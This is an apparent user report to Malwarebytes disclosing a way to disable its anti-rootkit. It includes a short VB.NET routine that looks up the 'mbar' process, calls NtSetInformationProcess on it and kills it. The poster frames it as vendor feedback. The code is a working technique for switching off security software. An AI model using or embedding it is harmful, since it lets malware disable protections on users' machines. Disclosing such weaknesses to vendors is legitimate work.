
Bug / Exploit report



MBAM anti-rootkit has been targeted by malware coded within VB.NET. Here's how malware can successfully disable MBAM anti-rootkit with around 10 lines of VB.NET.

This is simple stuff, Malwarebytes! I'm disappointed!

 

Here's the code:

Try
    Dim s As Integer = 0
    Dim ProcessPriorityClass As Integer = 29
    Dim lpProcessName As String = "mbar" '<--- Mbar is the Malwarebytes anti-rootkit
    For Each x As Process In Process.GetProcessesByName(lpProcessName)
        If NtSetInformationProcess(x.Handle, ProcessPriorityClass, s, Marshal.SizeOf(s)) = 0 Then
            x.Kill() 'Done.
            x.Refresh()
        Else
            x.Kill()
            x.Refresh()
        End If
    Next
Catch
    For Each ax As Process In Process.GetProcessesByName("mbar")
        Try
            ax.Refresh()
            ax.Kill()
            ax.CloseMainWindow()
        Catch : End Try 'Most likely the ax.Refresh killed off mbar, so ax.Kill failed with access denied!
    Next
End Try

This makes an error of unauthorised access on the mbar.exe (I'm on the admin account).

PS: I'm not wanting any reply, just want to make MBAM better! I'm not arrogant, I promise!

screenshot_2018.PNG
